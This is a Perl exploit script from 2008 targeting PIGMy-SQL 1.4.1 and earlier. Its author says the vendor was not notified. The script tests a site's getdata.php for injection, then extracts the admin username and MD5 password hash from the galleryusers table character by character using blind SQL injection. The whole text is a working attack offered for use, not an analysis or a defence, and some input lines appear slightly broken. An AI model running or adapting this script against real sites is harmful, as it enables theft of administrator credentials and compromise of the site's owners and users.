#!/usr/bin/perl # - PIGMy-SQL <= 1.4.1 Blind SQL Injection Exploit - # PIGMy-SQL is vulnerable because the mysql querys are insecure, therefor it allows an attack to execute sql querys, since the.. # ..vulnerable page only returns a picture we have to use a blind sql script, heres a little one i coded below, it will be alot faster using things like sqlmap etc. but this does the job # # Discovered And Coded By: t0pP8uZz # Discovered On: April 4 2008 # Vendor has not been notifed! # Admin login is at /admin/ # passwords are encrypted in MD5 # END OF use strict; use LWP::Simple; print "--------------------------------------------------\n"; print "- PIGMy-SQL <= 1.4.1 Blind SQL Injection Exploit -\n"; print "- Coded And Discovered By t0pP8uZz -\n"; print "- -\n"; print "- This exploit will obtain the admin user/pass.. -\n"; print "- ..Using a blind sql injection attack -\n"; print "--------------------------------------------------\n"; print "\nTarget Site: "; chomp(my $url=); print "Valid Photo ID: "; chomp(my $pid=); if(inject_test($url, $pid)) { print "\nInjecting Please Wait.. This could take several minutes.\n"; my $result = blindattack($url, $pid); print "Exploited! Admin Details Are: ".$result; exit; } sub blindattack { my $url = shift; my $pid = shift; my $done = 0; my $substr = 1; my $chr = 48; my $res = undef; while($done == 0) { my $content = get($url."/getdata.php?id=".$pid." and ascii(substring((select concat(name,0x3a,pass,0x5E) FROM galleryusers),".$substr.",1))=".$chr."/*"); if($content =~ /#/ && $chr == 94) { $done = 1; } elsif($content =~ /#/) { $res .= chr($chr); $substr++; $chr = 48; } else { $chr++; } } return $res; } sub inject_test { my $url = shift; my $pid = shift; my $true = get($url."/getdata.php?id=".$pid." and 1=1"); my $false = get($url."/getdata.php?id=".$pid." and 1=2"); if($true =~ /#/ && $false !~ /#/) { print "\nTarget Vulnerable!"; return 1; } else { print "Target not vulnerable! die'ing!"; exit; } }